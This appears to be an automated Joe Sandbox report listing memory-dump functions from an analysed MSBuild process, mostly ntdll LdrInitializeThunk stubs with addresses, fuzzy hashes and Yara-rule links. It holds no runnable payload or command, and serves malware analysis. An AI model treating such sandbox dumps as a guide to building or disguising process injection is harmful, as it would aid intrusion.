Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 718812f8b4ba1369cb3028c38db5478fa97fe4636c1b4cc16788de8abd64e3e3
Instruction ID: f12c695ba6645486073de3ec186feb3a39c33d3b3e40a9c28a44eb86f2fdee56
Opcode Fuzzy Hash: 718812f8b4ba1369cb3028c38db5478fa97fe4636c1b4cc16788de8abd64e3e3
Instruction Fuzzy Hash: 16B09B71D019C5C9DA12E764460C7177945B7D0701F15C065D3074685FC738C1D1E275

Function 018F2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01920DBD,?,?,?,?,01914302), ref: 018F2B6A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4fd573cdbf28e0f0fa1a4219e460ed25e550912cd03f75a13ccec0a2f187da8
Instruction ID: ba06e861cd64ebd102d9f877ceb0a5a4a26163e0896b1f343acf114d31dbac0e
Opcode Fuzzy Hash: a4fd573cdbf28e0f0fa1a4219e460ed25e550912cd03f75a13ccec0a2f187da8
Instruction Fuzzy Hash: 7790026170290047410671584418616804E97E0301B55C021E10545D4DC52589D16225

Function 018F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01929864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,018F034A,?,?,?,00000003), ref: 018F2ADA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28d1c76f3a8a5fe2668203eaca680119f1dab67655d330be2dbe6734d0bb317d
Instruction ID: ecc5833c7733e307dec55b3035dfb4c806e12c4387c935fc98fae37e009bc879
Opcode Fuzzy Hash: 28d1c76f3a8a5fe2668203eaca680119f1dab67655d330be2dbe6734d0bb317d
Instruction Fuzzy Hash: C1900225711900470106B5580708507408A97D5351355C021F1055594CD62189A15221

Function 018F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019091A3,00000000,00000000,?,?,?,018B8A1A,0198C2B0,00000018,018A8873), ref: 018F2DDA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7926ea6a116e717e5fad8853563a90197fb1370609d81ea704277b67f5238e28
Instruction ID: ec3e65e2070a4d3d8f5e760d740f60e47db8ce7b16ed6095b1f506116d6ee109
Opcode Fuzzy Hash: 7926ea6a116e717e5fad8853563a90197fb1370609d81ea704277b67f5238e28
Instruction Fuzzy Hash: 38900221742941965546B1584408507804AA7E0341795C012A1454994CC5269996D721

Function 018F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0192E73E,0000005A,0198D040,00000020,00000000,0198D040,00000080,01914A81,00000000,?,?,00000002,00000000,?,?,018FAE00), ref: 018F2DFA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65ac5e124ad845016c229447944b8a33e77c470345855af842a6581636561e34
Instruction ID: eec8a606655d4d708f7112547c3f1b0faf27bb293391a41c41cb522373b76d59
Opcode Fuzzy Hash: 65ac5e124ad845016c229447944b8a33e77c470345855af842a6581636561e34
Instruction Fuzzy Hash: 8390023170190457D11271584508707404D97D0341F95C412A046459CDD6568A92A221

Function 018F2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0193B508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 018F2D1A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a200e0385504da9e1ae25ae556b9d9bbedf11624c2915804fc59d382ac7f312f
Instruction ID: 70935481666760b126ec639a54dc30ca84adeeb7ccd801f54a61c4bf2fd088d7
Opcode Fuzzy Hash: a200e0385504da9e1ae25ae556b9d9bbedf11624c2915804fc59d382ac7f312f
Instruction Fuzzy Hash: 2B90022971390046D1817158540C60A404997D1302F95D415A005559CCC91589A95321

Function 018F2D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(018DA52A,000000FF,?,019A67F8,0198C9A0,00000020,018DA460,019A689C,00000000,0000001D,?,01422CD8), ref: 018F2D3A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b56677190e5e00dd4a1b5649177ff884111194b079d95b32eead26ee73eb1d2
Instruction ID: 7c3f319d8a6235bb52b815ace6f4a59a6e65d1b41f1c2fadf55fbec01eafab7e
Opcode Fuzzy Hash: 6b56677190e5e00dd4a1b5649177ff884111194b079d95b32eead26ee73eb1d2
Instruction Fuzzy Hash: 7F90022170190047D1417158541C6068049E7E1301F55D011E0454598CD91589965322

Function 018F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(018D3999,000000FA,00000001,?,00000050,?,?), ref: 018F2CAA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bed054749b2b5bbb819d3d79efd414236d174e9f701951bbad6752ecc007af9e
Instruction ID: 28a56252410095adc909244b83ff387456573bab2b89adc8955f1ddf87766f86
Opcode Fuzzy Hash: bed054749b2b5bbb819d3d79efd414236d174e9f701951bbad6752ecc007af9e
Instruction Fuzzy Hash: 1E90023170190446D1017598540C646404997E0301F55D011A5064599EC66589D16231

Function 018F2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(018AFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01907BE5,00001000,00004000,000000FF,?,00000000), ref: 018F2C7A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e7f13eb218d53bf7409361dafec80275a7923d51459776a7e5ae613b303ab07
Instruction ID: 342de3db973d0c238f59c171a8a6552228713c726b742efbc366abe3132c9f65
Opcode Fuzzy Hash: 9e7f13eb218d53bf7409361dafec80275a7923d51459776a7e5ae613b303ab07
Instruction Fuzzy Hash: F790023170198846D1117158840874A404997D0301F59C411A446469CDC69589D17221

Function 018F2F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0192CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 018F2F9A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e99fa255242f5938f6e2863713a4a1e2891b8266de00f0676a9806e239b0bf6
Instruction ID: db234c0d40134ff6de72703d8390caecca189172d30bb28ac8e7145c3617b99b
Opcode Fuzzy Hash: 5e99fa255242f5938f6e2863713a4a1e2891b8266de00f0676a9806e239b0bf6
Instruction Fuzzy Hash: 8C900231701D0446D1017158481870B404997D0302F55C011A11A4599DC62589916671

Function 018F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(018F05E3,00000000,00000000,00000001,00000000,00000000,00000000,?,018F2380,018F03B6,00000000,00000000,?,00000000,?), ref: 018F2FBA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 246cae07744939e7e2d50301308d6eb278dd223d23c5ff7c0d626fda412e3d48
Instruction ID: 025ef6e1217f3c950a7fb76d09ca68d84ef759e3c5b5f48696fc11a99fd85cad
Opcode Fuzzy Hash: 246cae07744939e7e2d50301308d6eb278dd223d23c5ff7c0d626fda412e3d48
Instruction Fuzzy Hash: 2B900221B01900864141716888489068049BBE1311755C121A09D8594DC55989A55765

Function 018F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(018F17E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 018F2FEA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 403249d67e3d1c141580ecc0a88cdec82df5aa778c7827965b7c2d6372bda8e6
Instruction ID: 5ea6fc29cffc0b83d5a87c26d3ce1fe98a416d23dd022607487dbb4e650032e8
Opcode Fuzzy Hash: 403249d67e3d1c141580ecc0a88cdec82df5aa778c7827965b7c2d6372bda8e6
Instruction Fuzzy Hash: 74900221711D0086D20175684C18B07404997D0303F55C115A0194598CC91589A15621

Function 018F2F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0193B4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 018F2F3A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 083e9ecbc02c495d8ad9b6c5507e31c66df59af93ca32fa022ae0206500c7f32
Instruction ID: cf2582402ba3ec15b8bb96930a1b75e96dafc2d0a27a33c33a7e5cba7fd77972
Opcode Fuzzy Hash: 083e9ecbc02c495d8ad9b6c5507e31c66df59af93ca32fa022ae0206500c7f32
Instruction Fuzzy Hash: F790026174190486D10171584418B064049D7E1301F55C015E10A4598DC619CD926226

Function 018F2E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0193809B,?,?,?,?,?), ref: 018F2E8A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6416ab0d31de57a5931050256f1046e7cedd099ad34cf5c9c5c6814a99e0d112
Instruction ID: 4e820d2e3da15b934dd09df75be70b180eab6b0dcd4f4b16405d1c51db9a36c7
Opcode Fuzzy Hash: 6416ab0d31de57a5931050256f1046e7cedd099ad34cf5c9c5c6814a99e0d112
Instruction Fuzzy Hash: 9E900221B0190546D10271584408616404E97D0341F95C022A1064599ECA258AD2A231

Function 018F2EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01911B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 018F2EAA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 966ff9af06f179d3319f90260e3f089066b03b67caf5976ae4be155641043bc4
Instruction ID: b2ffba91d2ed2bb6c521560290e97ab44b927c9ac71a0f7c707061422f796607
Opcode Fuzzy Hash: 966ff9af06f179d3319f90260e3f089066b03b67caf5976ae4be155641043bc4
Instruction Fuzzy Hash: D690027170190446D14171584408746404997D0301F55C011A50A4598EC6598ED56765

Function 0041F06D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2119069419.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction ID: bbcd9e0c7495b4b3c71782add9bd9e92ecbfcf2a3e8267f7fc475ee2e27bc91e
Opcode Fuzzy Hash: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction Fuzzy Hash: 63B0127495531E03041035B0264316977148581408B0003999DCC0F192EE01842302C3

Function 0041F070 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2119069419.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
Opcode Fuzzy Hash: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB

Non-executed Functions

Function 01934755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01934809

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01934899
LdrpCheckRedirection, xrefs: 0193488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01934888

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: feedbe8f7bb2e71f2d8bbc1831490f64c903ab0b19d408d06e293d5d8003b038
Instruction ID: a7f5e60b9a2c7c741a3d613b90fae6a6f7c4ef005e37750606abf300143526bd
Opcode Fuzzy Hash: feedbe8f7bb2e71f2d8bbc1831490f64c903ab0b19d408d06e293d5d8003b038
Instruction Fuzzy Hash: 3A419E32A147519FCB22CE69D840A27BBE8AFC9B51B070569ED5DD7351D730E800CBD2

Function 018F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 018F2DF0: LdrInitializeThunk.NTDLL(0192E73E,0000005A,0198D040,00000020,00000000,0198D040,00000080,01914A81,00000000,?,?,00000002,00000000,?,?,018FAE00), ref: 018F2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018F0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018F0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018F0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018F0D74

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
